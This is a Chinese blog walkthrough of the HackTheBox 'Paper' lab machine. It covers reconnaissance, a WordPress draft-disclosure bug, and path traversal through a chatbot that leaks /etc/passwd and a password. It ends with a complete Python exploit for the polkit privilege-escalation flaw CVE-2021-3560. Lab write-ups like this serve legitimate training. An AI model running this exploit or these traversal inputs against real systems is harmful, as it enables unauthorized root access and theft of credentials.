Hackthebox入门

Drinking-T

已于 2022-03-01 09:32:16 修改

阅读量2.1w

点赞数 5

文章标签：安全漏洞

于 2022-02-28 23:53:24 首次发布

本文链接：https://blog.csdn.net/DTSknanLP/article/details/123186959

版权

Hackthebox-Paper

连接Hackthebox靶场
Paper

连接Hackthebox靶场

环境：kail
注册并登录hackthebox平台，此时我们没有连接对方实验靶场，需要下载对方vpn并连接。

在这里插入图片描述
选择Machines->openVpn->downloadvpn，保存在本地

连接该VPN:

sudo openvpn lab_name.ovpn
此时，已成功连接至实验环境，那么，选择喜欢的实验机器，开始你的hack吧!

Paper

在这边我选择Pater这个机器，分配的IP为10.10.11.143
在这里插入图片描述

信息收集

后台nmap信息收集

sudo nmap -sS -sU 10.10.11.143

-sS：半开扫描
-sU：UDP模式
~~-Pn：只有该命令将指定的主机视作开启，跳过主机发现的过程，用作穿过防火墙~~

同时dirb扫后台目录，未扫到任何内容

dirb 10.10.11.143

访问该url，是个nginx的界面，并没有什么特别的内容。
在这里插入图片描述
f12查看响应包，发现一个x-Backend-Server:office.paper

直接无法访问，将其添入hosts中继续访问，

发现是个wordpress界面，用wpscan进一步扫描

wpscan --url http://office.paper

┌──(knan㉿Attack)-[~]
└─$ wpscan --url http://office.paper                                                                                       1 ⨯
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.10
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://office.paper/ [10.10.11.143]
[+] Started: Mon Feb 28 21:22:04 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
 |  - X-Powered-By: PHP/7.2.24
 |  - X-Backend-Server: office.paper
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://office.paper/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
 | Found By: Rss Generator (Passive Detection)
 |  - http://office.paper/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
 |  - http://office.paper/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>

[+] WordPress theme in use: construction-techup
 | Location: http://office.paper/wp-content/themes/construction-techup/
 | Last Updated: 2021-07-17T00:00:00.000Z
 | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt
 | [!] The version is out of date, the latest version is 1.4
 | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1
 | Style Name: Construction Techup
 | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...
 | Author: wptexture
 | Author URI: https://testerwp.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:07 <================================================> (137 / 137) 100.00% Time: 00:00:07

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Feb 28 21:22:26 2022
[+] Requests Done: 167
[+] Cached Requests: 5
[+] Data Sent: 37.027 KB
[+] Data Received: 167.529 KB
[+] Memory used: 228.91 MB
[+] Elapsed time: 00:00:21

这里发现wordpress为5.2.3
在这里插入图片描述

漏洞利用

搜索wordpress<5.2.3的漏洞，一篇文章有关于其原理
链接：Wordpress 5.2.3 未授权页面查看漏洞（CVE-2019-17671）分析
使用对应url：http://office.paper/?static=1&order=asc，发现404，还是有戏
在这里插入图片描述
通过文章得知，函数forsearch会遍历$public_query_vars数组，并从url中读取对应参数的值。原文中去除了对应~~http://127.0.0.1/wordpress/?static=0&order=asc&kumamon=test~~中的参数kumamon，此处作者或许又删除了一个参数

尝试去除参数order=asc，改为http://office.paper/?static=1，访问，成功访问到一篇文章。在这里插入图片描述

test

Micheal please remove the secret from drafts for gods sake!

Hello employees of Blunder Tiffin,

Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.

So, I kindly request you all to take your discussions from the public blog to a more private chat system.

-Nick

# Warning for Michael

Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick

Threat Level Midnight

A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT

[INT:DAY]

Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….

# Secret Registration URL of new Employee chat system

http://chat.office.paper/register/8qozr226AhkCHZdyY

# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.

# Also, stop looking at my drafts. Jeez!

我们注意到该url：http://chat.office.paper/register/8qozr226AhkCHZdyY
在这里插入图片描述
甩手扔进hosts内并访问

没有看到什么突破点，但是此处允许我们注册一个账号，那么我们尝试注册并登录。

我们进入后，会自动看到一个群聊的对话框，点击进入查看内容

在这里插入图片描述
向上翻看记录，发现可以给群聊机器人发送"recyclops help"这样一个信息

同时发现群聊无法发言，其他人无法互动，那么此时我们就去私聊这个机器人 Recyclops：

 Hello. I am Recyclops. A bot assigned by Dwight. I will have my revenge on earthlings, but before that, I have to help my Cool friend Dwight to respond to the annoying questions asked by his co-workers, so that he may use his valuable time to... well, not interact with his co-workers.
Most frequently asked questions include:
- What time is it?
- What new files are in your sale directory?
- Why did the salesman crossed the road?
- What's the content of file x in your sales directory? etc.
Please note that I am a beta version and I still have some bugs to be fixed.
How to use me ? :
1. Small Talk:
You can ask me how dwight's weekend was, or did he watched the game last night etc.
eg: 'recyclops how was your weekend?' or 'recyclops did you watched the game last night?' or 'recyclops what kind of bear is the best?
2. Joke:
You can ask me Why the salesman crossed the road.
eg: 'recyclops why did the salesman crossed the road?'
<=====The following two features are for those boneheads, who still don't know how to use scp. I'm Looking at you Kevin.=====>
For security reasons, the access is limited to the Sales folder.
3. Files:
eg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file sale/secret.xls' or just 'recyclops file test.txt'
4. List:
You can ask me to list the files
eg: 'recyclops i need directory list sale' or just 'recyclops list sale'
5. Time:
You can ask me what the time is
eg: 'recyclops what time is it?' or just 'recyclops time'
That's what I am capable of doing right now.
Also, Dwight is a cool guy and not a Time Thief!

发现其中第三、第四点内容比较重要。

3. Files:
eg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file sale/secret.xls' or just 'recyclops file test.txt'
4. List:
You can ask me to list the files
eg: 'recyclops i need directory list sale' or just 'recyclops list sale'

3. 文件:  
例如:'recyclops get me the file test.txt'，或'recyclops could you send me the file sale/secret.xls'或只是'recyclops file test.txt'  
4.  列表:  
你可以让我列出文件  
例如:‘recyclops I need directory list sale’或者只是‘recyclops list sale’。

尝试玩耍（bushi）：recyclops file test.txt
在这里插入图片描述
尝试目录穿越，成功获取到/etc/passwd内容

 <!=====Contents of file ../../../../../etc/passwd=====>
root:0:0:root:/root:/bin/bash
bin:1:1:bin:/bin:/sbin/nologin
daemon:2:2:daemon:/sbin:/sbin/nologin
adm:3:4:adm:/var/adm:/sbin/nologin
lp:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:5:0:sync:/sbin:/bin/sync
shutdown:6:0:shutdown:/sbin:/sbin/shutdown
halt:7:0:halt:/sbin:/sbin/halt
mail:8:12:mail:/var/spool/mail:/sbin/nologin
operator:11:0:operator:/root:/sbin/nologin
games:12:games:/usr/games:/sbin/nologin
ftp:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:65534:65534:Kernel Overflow User:/:/sbin/nologin
dbus:81:81:System message bus:/:/sbin/nologin
systemd-coredump:999:997:systemd Core Dumper:/:/sbin/nologin
systemd-resolve:193:193:systemd Resolver:/:/sbin/nologin
tss:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
polkitd:998:996:User for polkitd:/:/sbin/nologin
geoclue:997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
rtkit:172:172:RealtimeKit:/proc:/sbin/nologin
qemu:107:107:qemu user:/:/sbin/nologin
apache:48:48:Apache:/usr/share/httpd:/sbin/nologin
cockpit-ws:996:993:User for cockpit-ws:/:/sbin/nologin
pulse:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
usbmuxd:113:113:usbmuxd user:/:/sbin/nologin
unbound:995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin
rpc:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
gluster:994:989:GlusterFS daemons:/run/gluster:/sbin/nologin
chrony:993:987::/var/lib/chrony:/sbin/nologin
libstoragemgmt:992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
saslauth:991:76:Saslauthd user:/run/saslauthd:/sbin/nologin
dnsmasq:985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
radvd:75:75:radvd user:/:/sbin/nologin
clevis:984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
pegasus:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
sssd:983:981:User for sssd:/:/sbin/nologin
colord:982:980:User for colord:/var/lib/colord:/sbin/nologin
rpcuser:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
setroubleshoot:981:979::/var/lib/setroubleshoot:/sbin/nologin
pipewire:980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm:42:42::/var/lib/gdm:/sbin/nologin
gnome-initial-setup:979:977::/run/gnome-initial-setup/:/sbin/nologin
insights:978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin
sshd:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tcpdump:72:72::/:/sbin/nologin
mysql:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
nginx:977:975:Nginx web server:/var/lib/nginx:/sbin/nologin
mongod:976:974:mongod:/var/lib/mongo:/bin/false
rocketchat:1001:1001::/home/rocketchat:/bin/bash
dwight:1004:1004::/home/dwight:/bin/bash
<!=====End of file ../../../../../etc/passwd=====>

发现成功用file读取passwd后，我们尝试通过list获取其他信息：
recyclops list
在这里插入图片描述
依次查看当前目录，发现没有内容后，查看上级目录下其他子目录，在…/hubot目录下的.env文件内，发现了一些有价值的内容
recyclops list …/hubot

recyclops file …/hubot/.env
获取passwd为：

Queenofblad3s!23

通过这个密码，和/etc/passwd的用户名，我们尝试ssh登录，成功！
在这里插入图片描述
获得user权限

权限提升

Linux权限提升靶场
 CVE-2021-3560提权
这里使用CVE-2021-3560进行提权

import os
import sys
import time
import subprocess
import random
import pwd

print ("**************")
print("Exploit: Privilege escalation with polkit - CVE-2021-3560")
print("Exploit code written by Ahmad Almorabea @almorabea")
print("Original exploit author: Kevin Backhouse ")
print("For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/")
print ("**************")
print("[+] Starting the Exploit ")
time.sleep(3)

check = True
counter = 0
while check:
        counter = counter +1
        process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply','/org/freedesktop/Accounts','org.freedesktop.Accounts.CreateUser','string:ahmed','string:"Ahmad Almorabea','int32:1'])
        try:
                #print('1 - Running in process', process.pid)
                Random = random.uniform(0.006,0.009)
                process.wait(timeout=Random)
                process.kill()
        except subprocess.TimeoutExpired:
                #print('Timed out - killing', process.pid)
                process.kill()

        user = subprocess.run(['id', 'ahmed'], stdout=subprocess.PIPE).stdout.decode('utf-8')
        if user.find("uid") != -1:
                print("[+] User Created with the name of ahmed")
                print("[+] Timed out at: "+str(Random))
                check =False
                break
        if counter > 2000:
                print("[-] Couldn't add the user, try again it may work")
                sys.exit(0)

for i in range(200):
        #print(i)
        uid = "/org/freedesktop/Accounts/User"+str(pwd.getpwnam('ahmed').pw_uid)

        #In case you need to put a password un-comment the code below and put your password after string:yourpassword'
        password = "string:"
        #res = subprocess.run(['openssl', 'passwd','-5',password], stdout=subprocess.PIPE).stdout.decode('utf-8')
        #password = f"string:{res.rstrip()}"

        process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply',uid,'org.freedesktop.Accounts.User.SetPassword',password,'string:GoldenEye'])
        try:
                #print('1 - Running in process', process.pid)
                Random = random.uniform(0.006,0.009)
                process.wait(timeout=Random)
                process.kill()
        except subprocess.TimeoutExpired:
                #print('Timed out - killing', process.pid)
                process.kill()

print("[+] Timed out at: " + str(Random))
print("[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root ")

p = subprocess.call("(su ahmed -c 'sudo su')", shell=True)

在这里插入图片描述
进入/root目录下，查看到root.txt文件，获取我们所需的flag

总结

实话，这边最后一步提权，我也不知道为啥用这个提权，跟着大佬的思路走的，他的有"linpeas.sh"这个文件，我复现的结果却没有，另外网速太慢了，连不上那边，输入两个命令就掉线了，在这边便秘。提权后，应该就能看到对应的flag了，考虑到部分目标环境不存在python3环境，可以尝试[CVE-2021-3560提权]的方式。(https://blog.csdn.net/qq_35208730/article/details/118683245)